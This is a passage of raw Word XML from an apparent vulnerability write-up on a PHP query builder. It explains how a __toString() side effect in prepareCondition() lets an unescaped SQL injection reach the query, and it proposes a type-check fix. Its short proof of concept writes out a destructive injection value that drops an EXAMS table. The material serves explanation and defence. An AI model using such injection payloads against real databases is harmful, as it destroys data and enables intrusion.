          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>prepareCondition</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1E8D1B7F" w:rsidP="61D57FC2" w:rsidRDefault="1E8D1B7F" w14:paraId="4150ECB0" w14:textId="463B925C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>$query = $this-&gt;_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>conditionHelper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>($</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>conds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>['eq'], (string)$condition, $field</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="1E8D1B7F" w:rsidP="61D57FC2" w:rsidRDefault="1E8D1B7F" w14:paraId="15836A88" w14:textId="43F5C031">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Casting $x to a string causes the __</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>toString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>) function defined above to be called, changing the value of $field to an SQL injection snippet. Then, t</w:t>
      </w:r>
      <w:r w:rsidRPr="61D57FC2" w:rsidR="592621DD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">hat SQL injection </w:t>
      </w:r>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>value is passed to _</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>conditionHelper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>) and is NOT escaped</w:t>
      </w:r>
      <w:r w:rsidRPr="61D57FC2" w:rsidR="6A0A208D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="61D57FC2" w:rsidR="6A0A208D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>quoteInto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="61D57FC2" w:rsidR="6A0A208D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="61D57FC2" w:rsidR="297233D5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">. This makes </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="61D57FC2" w:rsidR="297233D5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>prepareCondition</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="61D57FC2" w:rsidR="297233D5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="61D57FC2" w:rsidR="297233D5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>) return a vulnerable query.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="297233D5" w:rsidP="61D57FC2" w:rsidRDefault="297233D5" w14:paraId="669943B3" w14:textId="43316E71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">The above bug could be fixed simply by checking whether $condition is a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> or an integer as expected by the author(s) of the original code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="297233D5" w:rsidP="61D57FC2" w:rsidRDefault="297233D5" w14:paraId="6B69C135" w14:textId="1457EF6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Here’s a quick code to try:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="297233D5" w:rsidP="61D57FC2" w:rsidRDefault="297233D5" w14:paraId="2E3388D4" w14:textId="61801677">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="297233D5" w:rsidP="61D57FC2" w:rsidRDefault="297233D5" w14:paraId="3AFDD57A" w14:textId="49283850">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>$x = new class {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="297233D5" w:rsidP="61D57FC2" w:rsidRDefault="297233D5" w14:paraId="2EF7F852" w14:textId="1A6A28D1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">    public function __</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>toString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="297233D5" w:rsidP="61D57FC2" w:rsidRDefault="297233D5" w14:paraId="7E43435C" w14:textId="2C26A8F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">        global $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>field;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="297233D5" w:rsidP="61D57FC2" w:rsidRDefault="297233D5" w14:paraId="3FCC7706" w14:textId="0F611421">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">        $field = "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>firstname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> = ''; DROP TABLE EXAMS; -- </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="297233D5" w:rsidP="61D57FC2" w:rsidRDefault="297233D5" w14:paraId="2CEF536C" w14:textId="2887FD0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">        return "none of your business</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="297233D5" w:rsidP="61D57FC2" w:rsidRDefault="297233D5" w14:paraId="4F8CF820" w14:textId="51702152">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="297233D5" w:rsidP="61D57FC2" w:rsidRDefault="297233D5" w14:paraId="66F9EB0F" w14:textId="007CCB30">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="297233D5" w:rsidP="61D57FC2" w:rsidRDefault="297233D5" w14:paraId="3888F6FC" w14:textId="64015DAE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="297233D5" w:rsidP="61D57FC2" w:rsidRDefault="297233D5" w14:paraId="60502FFE" w14:textId="7433CC25">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>$field = "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>firstname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="297233D5" w:rsidP="61D57FC2" w:rsidRDefault="297233D5" w14:paraId="051353F4" w14:textId="27E41E18">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="297233D5" w:rsidP="61D57FC2" w:rsidRDefault="297233D5" w14:paraId="7ECC8007" w14:textId="631AA721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>echo $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>field .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> " ||| ";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="297233D5" w:rsidP="61D57FC2" w:rsidRDefault="297233D5" w14:paraId="7E045A38" w14:textId="7C25B6A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="297233D5" w:rsidP="61D57FC2" w:rsidRDefault="297233D5" w14:paraId="5A836AAB" w14:textId="68726203">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">function </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>helper(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>$a, $b, $c) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="297233D5" w:rsidP="61D57FC2" w:rsidRDefault="297233D5" w14:paraId="7D68ADC9" w14:textId="5B2FEFC7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">    echo $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>c;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="297233D5" w:rsidP="61D57FC2" w:rsidRDefault="297233D5" w14:paraId="50844BB5" w14:textId="557AB423">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="297233D5" w:rsidP="61D57FC2" w:rsidRDefault="297233D5" w14:paraId="32D9EED3" w14:textId="295A0C58">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="297233D5" w:rsidP="61D57FC2" w:rsidRDefault="297233D5" w14:paraId="65944FFB" w14:textId="595A43F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>helper(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>null, (string)$x, $field);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="297233D5" w:rsidP="61D57FC2" w:rsidRDefault="297233D5" w14:paraId="17FB3204" w14:textId="503E9590">
      <w:pPr>
        <w:rPr>
